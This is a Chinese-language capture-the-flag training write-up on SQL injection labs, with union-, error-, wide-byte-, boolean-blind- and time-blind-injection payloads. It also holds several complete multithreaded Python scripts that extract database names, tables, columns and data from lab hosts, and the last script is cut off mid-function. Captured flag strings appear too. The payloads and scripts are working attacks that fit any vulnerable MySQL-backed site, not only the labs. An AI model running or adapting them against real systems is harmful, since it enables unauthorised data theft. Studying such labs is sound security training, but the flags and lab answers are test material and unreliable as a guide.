初学者训练营_OWASP_TOP10
XSS、CSRF、命令执行太简单就没写
入门SQL注入
数据库语句执行靶场

就是执行sql命令
sql
show databases;
use web;
show tables;
select * from web.flag;

flag{8e179390812e47bb917745f7ca5c10e0}
报错注入-sql注入-数字型

sql
1 and 1=1#
1 and 1=2#
2报错
1 order by 5#

最大是5

sql
1 union select 1,2,3,4,5
都可以注入,那还说啥了,秒了
sql
1 union select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema=database()# //爆表
1 union select group_concat(column_name),2,3,4,5 from information_schema.columns where table_schema=database() and table_name="flag"# //爆字段
1 union select group_concat(flag),2,3,4,5 from flag# //flag

报错注入-sql注入-字符型

七个字段
这里记下,字符型注释'-- 后面必须有个空格

猜一手flag在flag表里

猜对了
flag{e743eeb04d124100bf14f5e60e839859}
sql注入-布尔盲注
sql注入-宽字节注入
宽字节注入是一种SQL注入攻击技术,利用多字节字符集(如GBK、GB2312、Big5等)的编码特性,绕过转义函数(如addslashes()、mysql_real_escape_string())的保护,实现SQL语句注入。


admin%df' or 1=1#
sql注入-时间盲注-1
1'and sleep(4)--

sql注入-时间盲注-2
双引号
2"and sleep(4)--

sql注入-字符型-1


括号闭合
1') and 1=1--

1') order by 7--

1') union select 1,2,3,4,5,6,7--

1') union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database() --

sql
1') union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_schema=database() and table_name="flag"--
1') union select 1,2,group_concat(flag),4,5,6,7 from flag--
flag{d9f44135aa694305b91d28c61a2c4283}
sql注入-字符型-2



sql
1"union select 1,2,3,4,5,6,7--
1" union select 1,database(), group_concat(column_name),4,5,6,7 from information_schema.columns where table_name='flag' --

1" union select 1,database(), group_concat(flag),4,5,6,7 from sql_injection_lab.flag --

sql注入-时间盲注
1 and if(1=1,sleep(5),1)

SQL注入布尔
python
1' AND length(DATABASE())=1#
1' AND LENGTH(DATABASE())=2#
1%20AND%20(SELECT%20LENGTH(DATABASE()))=1
import requests
from concurrent.futures import ThreadPoolExecutor
# ===================== 配置 =====================
# Probe target; each payload is concatenated straight onto this string, so
# the query already carries "id=1" and every payload starts with " AND ...".
base_url = "http://gaacbhe.haobachang2.loveli.com.cn:8888/check?id=1"
# Worker count of the per-position ThreadPoolExecutor used by every stage.
MAX_THREAD = 30
# Code points tried per character: 48 ('0') .. 122 ('z') inclusive; a
# character outside that band is never matched and is left blank.
CHARSET = range(48, 123)
# ==================================================
def req(payload):
    """Send one boolean-blind probe and return the oracle's verdict.

    ``payload`` is appended verbatim to ``base_url`` and the JSON field
    ``exists`` of the reply is returned. Every failure — connection error,
    the 2 s timeout, a non-JSON body, a missing key — collapses to ``False``,
    so a flaky target is indistinguishable from "condition false".

    Defender note: the raw SQL fragment travels in the query string of a GET,
    so each probe is fully visible in the access log and to a WAF; the
    tell is the burst of near-identical requests differing in one number.
    """
    try:
        return requests.get(base_url + payload, timeout=2).json()["exists"]
    except:
        return False
# -------------------- 1. 爆库 --------------------
def get_db_len():
    """Linear-search the length of the current database name.

    Lengths 1..29 are tried in order; the first one the oracle confirms is
    printed and returned. Returns ``None`` when nothing in that range matches
    (for instance when ``req`` answers ``False`` for every probe); the caller
    does not guard against that.
    """
    size = next(
        (i for i in range(1, 30) if req(f" AND (SELECT LENGTH(DATABASE()))={i}")),
        None,
    )
    if size is not None:
        print(f"✅ 数据库长度: {size}")
    return size
def get_db_name(db_len):
    """Recover the database name one position at a time.

    A worker per position (at most ``MAX_THREAD`` concurrently) walks
    ``CHARSET`` and stops at the first code point the oracle accepts, printing
    it as it goes. Positions that never match stay empty, so the joined name
    can be shorter than ``db_len``. Worker exceptions are never collected.
    """
    positions = range(1, db_len + 1)
    recovered = {}

    def probe(pos):
        for code in CHARSET:
            if not req(f" AND ASCII(SUBSTRING(DATABASE(),{pos},1))={code}"):
                continue
            recovered[pos] = chr(code)
            print(f"第{pos}位: {chr(code)}")
            break

    with ThreadPoolExecutor(MAX_THREAD) as pool:
        for pos in positions:
            pool.submit(probe, pos)
    db = "".join(recovered.get(pos, "") for pos in positions)
    print(f"\n🎉 数据库名: {db}")
    return db
# -------------------- 2. 爆表 --------------------
def get_table_count(db):
    """Linear-search the number of tables in schema ``db`` (1..19).

    Prints and returns the first count the oracle confirms; returns ``None``
    if none does. ``db`` is spliced into the SQL text as-is.
    """
    count = next(
        (
            i
            for i in range(1, 20)
            if req(f" AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='{db}')={i}")
        ),
        None,
    )
    if count is not None:
        print(f"✅ 表总数: {count}")
    return count
def get_all_tables(db, count):
    """Enumerate ``count`` table names of schema ``db`` via information_schema.

    For each index the name length is searched in 1..49 (0 if nothing
    matches, yielding an empty name), then every position is resolved in
    parallel over ``CHARSET``. Returns the names in index order.
    """
    tables = []
    for idx in range(count):
        name_len = next(
            (
                i
                for i in range(1, 50)
                if req(f" AND LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema='{db}' LIMIT {idx},1))={i}")
            ),
            0,
        )
        positions = range(1, name_len + 1)
        chars = {}

        def probe(pos):
            for code in CHARSET:
                if req(f" AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='{db}' LIMIT {idx},1),{pos},1))={code}"):
                    chars[pos] = chr(code)
                    break

        with ThreadPoolExecutor(MAX_THREAD) as pool:
            for pos in positions:
                pool.submit(probe, pos)
        table = "".join(chars.get(pos, "") for pos in positions)
        tables.append(table)
        print(f"✅ 表{idx+1}: {table}")
    return tables
# -------------------- 3. 爆【所有字段】 --------------------
def get_all_columns(db, table):
    """Enumerate every column name of ``db``.``table``.

    The column count is searched in 1..9 (0 if none matches, in which case
    no names are resolved), each name's length in 1..49, and each character
    in parallel over ``CHARSET``. ``db`` and ``table`` are spliced into the
    SQL text exactly as the previous stages produced them.
    """
    print(f"\n==== 爆破 {table} 所有字段 ====")
    cols = []
    col_count = next(
        (
            i
            for i in range(1, 10)
            if req(f" AND (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}')={i}")
        ),
        0,
    )
    print(f"✅ 字段总数: {col_count}")
    for idx in range(col_count):
        name_len = next(
            (
                i
                for i in range(1, 50)
                if req(f" AND LENGTH((SELECT column_name FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}' LIMIT {idx},1))={i}")
            ),
            0,
        )
        positions = range(1, name_len + 1)
        chars = {}

        def probe(pos):
            for code in CHARSET:
                if req(f" AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}' LIMIT {idx},1),{pos},1))={code}"):
                    chars[pos] = chr(code)
                    break

        with ThreadPoolExecutor(MAX_THREAD) as pool:
            for pos in positions:
                pool.submit(probe, pos)
        col = "".join(chars.get(pos, "") for pos in positions)
        cols.append(col)
        print(f"✅ 字段{idx+1}: {col}")
    return cols
# -------------------- 4. 爆【真实数据】 --------------------
def get_data(table, col):
    """Read the first row of ``table``.``col`` one character at a time.

    The value length is searched in 1..99 (0 if none matches), then each
    position is resolved in parallel over ``CHARSET``. Only ``LIMIT 0,1`` is
    ever queried, so further rows are not read. ``table`` and ``col`` enter
    the SQL text unquoted.
    """
    print(f"\n==== 爆破 {table}.{col} ====")
    value_len = next(
        (i for i in range(1, 100) if req(f" AND LENGTH((SELECT {col} FROM {table} LIMIT 0,1))={i}")),
        0,
    )
    positions = range(1, value_len + 1)
    chars = {}

    def probe(pos):
        for code in CHARSET:
            if req(f" AND ASCII(SUBSTRING((SELECT {col} FROM {table} LIMIT 0,1),{pos},1))={code}"):
                chars[pos] = chr(code)
                break

    with ThreadPoolExecutor(MAX_THREAD) as pool:
        for pos in positions:
            pool.submit(probe, pos)
    data = "".join(chars.get(pos, "") for pos in positions)
    print(f"🏆 数据: {data}")
    return data
# ===================== 主程序 =====================
if __name__ == '__main__':
    # Pipeline: database name -> table names -> column names -> first row of
    # each column. A stage that finds nothing (get_db_len/get_table_count
    # returning None) makes the next stage raise rather than stop cleanly.
    db = get_db_name(get_db_len())
    tables = get_all_tables(db, get_table_count(db))
    for table in tables:
        for col in get_all_columns(db, table):
            get_data(table, col)
sql注入-时间盲注
F12

1 and if(1=1,sleep(2),null)

sql
1 and if(length(database())=17,sleep(2),null)
1+and+if((select+count(table_name)+from+information_schema.tables+where+table_schema=database())=2,sleep(2),1
1+and+if(length((select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()))>5,sleep(2),1)
1+and+if((select+count(column_name)+from+information_schema.columns+where+table_name='flag')=2,sleep(5),1)
1+and+if(substr((select+group_concat(column_name)+from+information_schema.columns+where+table_name='flag'),1,1)='a',sleep(2),1)
1+and+if(length((select+flag+from+flag))>10,sleep(2),1)
1+and+if(substr((select+flag+from+flag),1,1)='a',sleep(2),1)
python
import requests
import time
from concurrent.futures import ThreadPoolExecutor
# ===================== 配置 =====================
# Probe target; the IF(..., SLEEP(), 0) clause built by req() is appended
# straight onto this string, which already carries "id=1".
base_url = "http://zj1xpzr.haobachang2.loveli.com.cn:8888/check?id=1"
MAX_THREAD = 20 # keep concurrency low for time-based probing to avoid timeouts
# Code points tried per character: 48 ('0') .. 122 ('z') inclusive.
CHARSET = range(48, 123)
TIME_OUT = 3 # per-request timeout in seconds; must exceed SLEEP_TIME
SLEEP_TIME = 2 # seconds the true branch sleeps; the oracle threshold is this minus 0.1
# ==================================================
def req(payload):
    """Time-based probe: true when the reply took at least ``SLEEP_TIME - 0.1`` s.

    ``payload`` is a bare SQL condition; it is wrapped in
    ``IF(<cond>, SLEEP(SLEEP_TIME), 0)`` and appended to ``base_url``. The
    wall-clock time of the GET is the only signal — the body is discarded.
    Any exception (including the ``TIME_OUT`` timeout, which is what a slow
    true branch under latency looks like) is reported as ``False``.

    Defender note: a true branch costs the server a full ``SLEEP_TIME``, so
    this shows up as a run of requests with unusually uniform response times
    and ``SLEEP(`` in the query string.
    """
    condition = f" AND IF({payload}, SLEEP({SLEEP_TIME}), 0)"
    started = time.time()
    try:
        requests.get(base_url + condition, timeout=TIME_OUT)
    except:
        return False
    elapsed = time.time() - started
    return elapsed >= SLEEP_TIME - 0.1
# -------------------- 1. 爆库 --------------------
def get_db_len():
    """Linear-search the database-name length over 1..29.

    The first length the timing oracle confirms is printed and returned;
    ``None`` is returned when no probe in that range is slow enough.
    """
    size = next(
        (i for i in range(1, 30) if req(f"(SELECT LENGTH(DATABASE()))={i}")),
        None,
    )
    if size is not None:
        print(f"✅ 数据库长度: {size}")
    return size
def get_db_name(db_len):
    """Recover the database name, one worker per position.

    Each worker walks ``CHARSET`` until the timing oracle confirms a code
    point and prints it. Unresolved positions stay empty, so the result may
    be shorter than ``db_len``. Worker exceptions are never collected.
    """
    positions = range(1, db_len + 1)
    recovered = {}

    def probe(pos):
        for code in CHARSET:
            if not req(f"ASCII(SUBSTRING(DATABASE(),{pos},1))={code}"):
                continue
            recovered[pos] = chr(code)
            print(f"第{pos}位: {chr(code)}")
            break

    with ThreadPoolExecutor(MAX_THREAD) as pool:
        for pos in positions:
            pool.submit(probe, pos)
    db = "".join(recovered.get(pos, "") for pos in positions)
    print(f"\n🎉 数据库名: {db}")
    return db
# -------------------- 2. 爆表 --------------------
def get_table_count(db):
    """Linear-search the table count of schema ``db`` over 1..19.

    Prints and returns the first confirmed count, or ``None`` if none is.
    ``db`` is spliced into the SQL text as-is.
    """
    count = next(
        (
            i
            for i in range(1, 20)
            if req(f"(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='{db}')={i}")
        ),
        None,
    )
    if count is not None:
        print(f"✅ 表总数: {count}")
    return count
def get_all_tables(db, count):
    """Enumerate ``count`` table names of schema ``db`` with the timing oracle.

    Per index: length search over 1..49 (0, i.e. an empty name, if nothing
    matches), then a parallel walk of ``CHARSET`` per position. Names are
    returned in index order.
    """
    tables = []
    for idx in range(count):
        name_len = next(
            (
                i
                for i in range(1, 50)
                if req(f"LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema='{db}' LIMIT {idx},1))={i}")
            ),
            0,
        )
        positions = range(1, name_len + 1)
        chars = {}

        def probe(pos):
            for code in CHARSET:
                if req(f"ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='{db}' LIMIT {idx},1),{pos},1))={code}"):
                    chars[pos] = chr(code)
                    break

        with ThreadPoolExecutor(MAX_THREAD) as pool:
            for pos in positions:
                pool.submit(probe, pos)
        table = "".join(chars.get(pos, "") for pos in positions)
        tables.append(table)
        print(f"✅ 表{idx+1}: {table}")
    return tables
# -------------------- 3. 爆字段 --------------------
def get_all_columns(db, table):
    """Enumerate every column name of ``db``.``table`` with the timing oracle.

    Column count is searched over 1..9 (0 if none matches, so nothing is
    resolved), each name's length over 1..49, each character in parallel
    over ``CHARSET``. ``db`` and ``table`` go into the SQL text as-is.
    """
    print(f"\n==== 爆破 {table} 所有字段 ====")
    cols = []
    col_count = next(
        (
            i
            for i in range(1, 10)
            if req(f"(SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}')={i}")
        ),
        0,
    )
    print(f"✅ 字段总数: {col_count}")
    for idx in range(col_count):
        name_len = next(
            (
                i
                for i in range(1, 50)
                if req(f"LENGTH((SELECT column_name FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}' LIMIT {idx},1))={i}")
            ),
            0,
        )
        positions = range(1, name_len + 1)
        chars = {}

        def probe(pos):
            for code in CHARSET:
                if req(f"ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}' LIMIT {idx},1),{pos},1))={code}"):
                    chars[pos] = chr(code)
                    break

        with ThreadPoolExecutor(MAX_THREAD) as pool:
            for pos in positions:
                pool.submit(probe, pos)
        col = "".join(chars.get(pos, "") for pos in positions)
        cols.append(col)
        print(f"✅ 字段{idx+1}: {col}")
    return cols
# -------------------- 4. 爆数据 --------------------
def get_data(table, col):
    """Read the first row of ``table``.``col`` through the timing oracle.

    Value length is searched over 1..99 (0 if none matches), then each
    position is resolved in parallel over ``CHARSET``. Only ``LIMIT 0,1`` is
    queried. ``table`` and ``col`` enter the SQL text unquoted.
    """
    print(f"\n==== 爆破 {table}.{col} ====")
    value_len = next(
        (i for i in range(1, 100) if req(f"LENGTH((SELECT {col} FROM {table} LIMIT 0,1))={i}")),
        0,
    )
    positions = range(1, value_len + 1)
    chars = {}

    def probe(pos):
        for code in CHARSET:
            if req(f"ASCII(SUBSTRING((SELECT {col} FROM {table} LIMIT 0,1),{pos},1))={code}"):
                chars[pos] = chr(code)
                break

    with ThreadPoolExecutor(MAX_THREAD) as pool:
        for pos in positions:
            pool.submit(probe, pos)
    data = "".join(chars.get(pos, "") for pos in positions)
    print(f"🏆 数据: {data}")
    return data
# ===================== 主程序 =====================
if __name__ == '__main__':
    # Same pipeline as the boolean variant, driven by response time instead
    # of a JSON field: database -> tables -> columns -> first row per column.
    db = get_db_name(get_db_len())
    tables = get_all_tables(db, get_table_count(db))
    for table in tables:
        for col in get_all_columns(db, table):
            get_data(table, col)
sql注入-布尔盲注-1
sql
1' and 1=1 or' #
SELECT * FROM user WHERE id='1' and 1=1 or' ' AND status=1
1' and length(database())=17 or' #
WHERE id='1' and length(database())=17 or' ' AND 其他条件
1' AND ASCII(SUBSTRING(DATABASE(),1,1))=115 or' #
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='sql_injection_lab')=2 or' #
' AND LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema='sql_injection_lab' LIMIT 1,1))=97 or' #
' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='sql_injection_lab' LIMIT 1,1),1,1))=97 or' #
' AND (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag')=1 or' #
' AND LENGTH((SELECT column_name FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag' LIMIT 1,1))=1 or' #
' AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag' LIMIT 1,1),1,1))=97 or' #
' AND LENGTH((SELECT flag FROM flag LIMIT 0,1))=10 or' #
' AND ASCII(SUBSTRING((SELECT flag FROM flag LIMIT 0,1),1,1))=102 or' #
python
import requests
from concurrent.futures import ThreadPoolExecutor
# ===================== 配置 =====================
# base_url already carries id=1; payloads do not prepend another 1 but close
# the quote themselves, in the shape  ' AND <cond> or' #
base_url = "http://i7u7g75.haobachang2.loveli.com.cn:8888/check?id=1"
# Worker count of the per-position ThreadPoolExecutor used by every stage.
MAX_THREAD = 20
# Code points tried per character: 48 ('0') .. 122 ('z') inclusive.
CHARSET = range(48, 123)
# ==================================================
def req(payload):
    """Send one boolean-blind probe and return the ``exists`` JSON field.

    ``payload`` is appended verbatim to ``base_url``. Every failure — network
    error, the 3 s timeout, a non-JSON body, a missing key — collapses to
    ``False``, so the caller cannot tell an outage from a false condition.

    Defender note: the quote-closing fragment ``' AND ... or' #`` rides in
    the GET query string, so each probe is visible verbatim in access logs.
    """
    try:
        return requests.get(base_url + payload, timeout=3).json()["exists"]
    except:
        return False
# -------------------- 1. 爆库 --------------------
def get_db_len():
    """Linear-search the database-name length over 1..29.

    The payload drops the leading ``1`` and uses the quote-closing form
    ``' and <cond> or' #``. Prints and returns the first confirmed length,
    or ``None`` if none is confirmed.
    """
    size = next(
        (i for i in range(1, 30) if req(f"' and length(database())={i} or' #")),
        None,
    )
    if size is not None:
        print(f"✅ 数据库长度: {size}")
    return size
def get_db_name(db_len):
    """Recover the database name, one worker per position.

    Each worker walks ``CHARSET`` until the oracle confirms a code point and
    prints it. Unresolved positions stay empty, so the result may be shorter
    than ``db_len``. Worker exceptions are never collected.
    """
    positions = range(1, db_len + 1)
    recovered = {}

    def probe(pos):
        for code in CHARSET:
            if not req(f"' AND ASCII(SUBSTRING(DATABASE(),{pos},1))={code} or' #"):
                continue
            recovered[pos] = chr(code)
            print(f"第{pos}位: {chr(code)}")
            break

    with ThreadPoolExecutor(MAX_THREAD) as pool:
        for pos in positions:
            pool.submit(probe, pos)
    db = "".join(recovered.get(pos, "") for pos in positions)
    print(f"\n🎉 数据库名: {db}")
    return db
# -------------------- 2. 爆表 --------------------
def get_table_count(db):
    """Linear-search the table count of schema ``db`` over 1..19.

    Prints and returns the first confirmed count, or ``None`` if none is.
    ``db`` is spliced into the SQL text as-is.
    """
    count = next(
        (
            i
            for i in range(1, 20)
            if req(f"' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='{db}')={i} or' #")
        ),
        None,
    )
    if count is not None:
        print(f"✅ 表总数: {count}")
    return count
def get_all_tables(db, count):
    """Enumerate ``count`` table names of schema ``db`` via information_schema.

    Per index: length search over 1..49 (0, i.e. an empty name, if nothing
    matches), then a parallel walk of ``CHARSET`` per position. Names are
    returned in index order.
    """
    tables = []
    for idx in range(count):
        name_len = next(
            (
                i
                for i in range(1, 50)
                if req(f"' AND LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema='{db}' LIMIT {idx},1))={i} or' #")
            ),
            0,
        )
        positions = range(1, name_len + 1)
        chars = {}

        def probe(pos):
            for code in CHARSET:
                if req(f"' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='{db}' LIMIT {idx},1),{pos},1))={code} or' #"):
                    chars[pos] = chr(code)
                    break

        with ThreadPoolExecutor(MAX_THREAD) as pool:
            for pos in positions:
                pool.submit(probe, pos)
        table = "".join(chars.get(pos, "") for pos in positions)
        tables.append(table)
        print(f"✅ 表{idx+1}: {table}")
    return tables
# -------------------- 3. 爆【所有字段】 --------------------
def get_all_columns(db, table):
    """Enumerate every column name of ``db``.``table``.

    Column count is searched over 1..9 (0 if none matches, so nothing is
    resolved), each name's length over 1..49, each character in parallel
    over ``CHARSET``. ``db`` and ``table`` go into the SQL text as-is.
    """
    print(f"\n==== 爆破 {table} 所有字段 ====")
    cols = []
    col_count = next(
        (
            i
            for i in range(1, 10)
            if req(f"' AND (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}')={i} or' #")
        ),
        0,
    )
    print(f"✅ 字段总数: {col_count}")
    for idx in range(col_count):
        name_len = next(
            (
                i
                for i in range(1, 50)
                if req(f"' AND LENGTH((SELECT column_name FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}' LIMIT {idx},1))={i} or' #")
            ),
            0,
        )
        positions = range(1, name_len + 1)
        chars = {}

        def probe(pos):
            for code in CHARSET:
                if req(f"' AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}' LIMIT {idx},1),{pos},1))={code} or' #"):
                    chars[pos] = chr(code)
                    break

        with ThreadPoolExecutor(MAX_THREAD) as pool:
            for pos in positions:
                pool.submit(probe, pos)
        col = "".join(chars.get(pos, "") for pos in positions)
        cols.append(col)
        print(f"✅ 字段{idx+1}: {col}")
    return cols
# -------------------- 4. 爆【真实数据】 --------------------
def get_data(table, col):
    """Read the first row of ``table``.``col`` one character at a time.

    Value length is searched over 1..99 (0 if none matches), then each
    position is resolved in parallel over ``CHARSET``. Only ``LIMIT 0,1`` is
    queried. ``table`` and ``col`` enter the SQL text unquoted.
    """
    print(f"\n==== 爆破 {table}.{col} ====")
    value_len = next(
        (i for i in range(1, 100) if req(f"' AND LENGTH((SELECT {col} FROM {table} LIMIT 0,1))={i} or' #")),
        0,
    )
    positions = range(1, value_len + 1)
    chars = {}

    def probe(pos):
        for code in CHARSET:
            if req(f"' AND ASCII(SUBSTRING((SELECT {col} FROM {table} LIMIT 0,1),{pos},1))={code} or' #"):
                chars[pos] = chr(code)
                break

    with ThreadPoolExecutor(MAX_THREAD) as pool:
        for pos in positions:
            pool.submit(probe, pos)
    data = "".join(chars.get(pos, "") for pos in positions)
    print(f"🏆 数据: {data}")
    return data
# ===================== 主程序 =====================
if __name__ == '__main__':
    # database -> tables -> columns -> first row per column; a stage that
    # returns None makes the following stage raise.
    db_name = get_db_name(get_db_len())
    tables = get_all_tables(db_name, get_table_count(db_name))
    for table in tables:
        for col in get_all_columns(db_name, table):
            get_data(table, col)
sql注入-布尔盲注-2
sql
1" and 1="1
WHERE id="1" and 1="1"
1" and 1="2
WHERE id="1" and 1="2"
1" and length(database())="17
WHERE id="1" and length(database())="17"
1" and ASCII(SUBSTRING(DATABASE(),1,1))="115
WHERE id="1" and ASCII(SUBSTRING(DATABASE(),1,1))="115"
1" and (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='sql_injection_lab')="2
WHERE id="1" and (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='sql_injection_lab')="2"
1" and LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema='sql_injection_lab' LIMIT 1,1))="97
WHERE id="1" and LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema='sql_injection_lab' LIMIT 1,1))="97"
1" and ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='sql_injection_lab' LIMIT 1,1),1,1))="97
WHERE id="1" and ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='sql_injection_lab' LIMIT 1,1),1,1))="97"
1" and (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag')="1
WHERE id="1" and (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag')="1"
1" and LENGTH((SELECT column_name FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag' LIMIT 1,1))="1
WHERE id="1" and LENGTH((SELECT column_name FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag' LIMIT 1,1))="1"
1" and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag' LIMIT 1,1),1,1))="97
WHERE id="1" and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag' LIMIT 1,1),1,1))="97"
1" and LENGTH((SELECT flag FROM flag LIMIT 0,1))="10
WHERE id="1" and LENGTH((SELECT flag FROM flag LIMIT 0,1))="10"
1" and ASCII(SUBSTRING((SELECT flag FROM flag LIMIT 0,1),1,1))="102
WHERE id="1" and ASCII(SUBSTRING((SELECT flag FROM flag LIMIT 0,1),1,1))="102"
python
import requests
from concurrent.futures import ThreadPoolExecutor
# ===================== 配置 =====================
# Probe target; payloads close the double-quoted id value themselves, in the
# shape  " and <cond>="<n>  (the server's closing quote completes the value).
base_url = "http://fmg41ar.haobachang2.loveli.com.cn:8888/check?id=1"
# Worker count of the per-position ThreadPoolExecutor used by every stage.
MAX_THREAD = 15
# Code points tried per character: 48 ('0') .. 122 ('z') inclusive.
CHARSET = range(48, 123)
# ==================================================
def req(payload):
    """Send one boolean-blind probe and return the ``exists`` JSON field.

    ``payload`` is appended verbatim to ``base_url``. Every failure — network
    error, the 3 s timeout, a non-JSON body, a missing key — collapses to
    ``False``, so the caller cannot tell an outage from a false condition.

    Defender note: each probe is a GET whose query string carries the SQL
    fragment in clear, so the enumeration is visible verbatim in access logs.
    """
    try:
        return requests.get(base_url + payload, timeout=3).json()["exists"]
    except:
        return False
# -------------------- 1. 爆库长度 --------------------
def get_db_len():
    """Linear-search the database-name length over 1..29.

    Prints and returns the first confirmed length, or ``None`` if none is.
    """
    size = next(
        (i for i in range(1, 30) if req(f"\" and length(database())=\"{i}")),
        None,
    )
    if size is not None:
        print(f"✅ 数据库长度: {size}")
    return size
# -------------------- 2. 爆库名 --------------------
def get_db_name(db_len):
    """Recover the database name, one worker per position.

    Each worker walks ``CHARSET`` until the oracle confirms a code point and
    prints it. Unresolved positions stay empty, so the result may be shorter
    than ``db_len``. Worker exceptions are never collected.
    """
    positions = range(1, db_len + 1)
    recovered = {}

    def probe(pos):
        for code in CHARSET:
            if not req(f"\" AND ASCII(SUBSTRING(DATABASE(),{pos},1))=\"{code}"):
                continue
            recovered[pos] = chr(code)
            print(f"第{pos}位: {chr(code)}")
            break

    with ThreadPoolExecutor(MAX_THREAD) as pool:
        for pos in positions:
            pool.submit(probe, pos)
    db = "".join(recovered.get(pos, "") for pos in positions)
    print(f"\n🎉 数据库名: {db}")
    return db
# -------------------- 3. 爆表数量 --------------------
def get_table_count(db):
    """Linear-search the table count of schema ``db`` over 1..19.

    Prints and returns the first confirmed count, or ``None`` if none is.
    ``db`` is spliced into the SQL text as-is.
    """
    count = next(
        (
            i
            for i in range(1, 20)
            if req(f"\" AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='{db}')=\"{i}")
        ),
        None,
    )
    if count is not None:
        print(f"✅ 表总数: {count}")
    return count
# -------------------- 4. 爆表名 --------------------
def get_all_tables(db, count):
    """Enumerate ``count`` table names of schema ``db`` via information_schema.

    Per index: length search over 1..49 (0, i.e. an empty name, if nothing
    matches), then a parallel walk of ``CHARSET`` per position. Names are
    returned in index order.
    """
    tables = []
    for idx in range(count):
        name_len = next(
            (
                i
                for i in range(1, 50)
                if req(f"\" AND LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema='{db}' LIMIT {idx},1))=\"{i}")
            ),
            0,
        )
        positions = range(1, name_len + 1)
        chars = {}

        def probe(pos):
            for code in CHARSET:
                if req(f"\" AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='{db}' LIMIT {idx},1),{pos},1))=\"{code}"):
                    chars[pos] = chr(code)
                    break

        with ThreadPoolExecutor(MAX_THREAD) as pool:
            for pos in positions:
                pool.submit(probe, pos)
        table = "".join(chars.get(pos, "") for pos in positions)
        tables.append(table)
        print(f"✅ 表{idx+1}: {table}")
    return tables
# -------------------- 5. 爆字段 --------------------
def get_all_columns(db, table):
    """Enumerate every column name of ``db``.``table``.

    Column count is searched over 1..9 (0 if none matches, so nothing is
    resolved), each name's length over 1..49, each character in parallel
    over ``CHARSET``. ``db`` and ``table`` go into the SQL text as-is.
    """
    print(f"\n==== 爆破 {table} 所有字段 ====")
    cols = []
    col_count = next(
        (
            i
            for i in range(1, 10)
            if req(f"\" AND (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}')=\"{i}")
        ),
        0,
    )
    print(f"✅ 字段总数: {col_count}")
    for idx in range(col_count):
        name_len = next(
            (
                i
                for i in range(1, 50)
                if req(f"\" AND LENGTH((SELECT column_name FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}' LIMIT {idx},1))=\"{i}")
            ),
            0,
        )
        positions = range(1, name_len + 1)
        chars = {}

        def probe(pos):
            for code in CHARSET:
                if req(f"\" AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}' LIMIT {idx},1),{pos},1))=\"{code}"):
                    chars[pos] = chr(code)
                    break

        with ThreadPoolExecutor(MAX_THREAD) as pool:
            for pos in positions:
                pool.submit(probe, pos)
        col = "".join(chars.get(pos, "") for pos in positions)
        cols.append(col)
        print(f"✅ 字段{idx+1}: {col}")
    return cols
# -------------------- 6. 爆数据 --------------------
def get_data(table, col):
    """Read the first row of ``table``.``col`` one character at a time.

    Value length is searched over 1..99 (0 if none matches), then each
    position is resolved in parallel over ``CHARSET``. Only ``LIMIT 0,1`` is
    queried. ``table`` and ``col`` enter the SQL text unquoted.
    """
    print(f"\n==== 爆破 {table}.{col} ====")
    value_len = next(
        (i for i in range(1, 100) if req(f"\" AND LENGTH((SELECT {col} FROM {table} LIMIT 0,1))=\"{i}")),
        0,
    )
    positions = range(1, value_len + 1)
    chars = {}

    def probe(pos):
        for code in CHARSET:
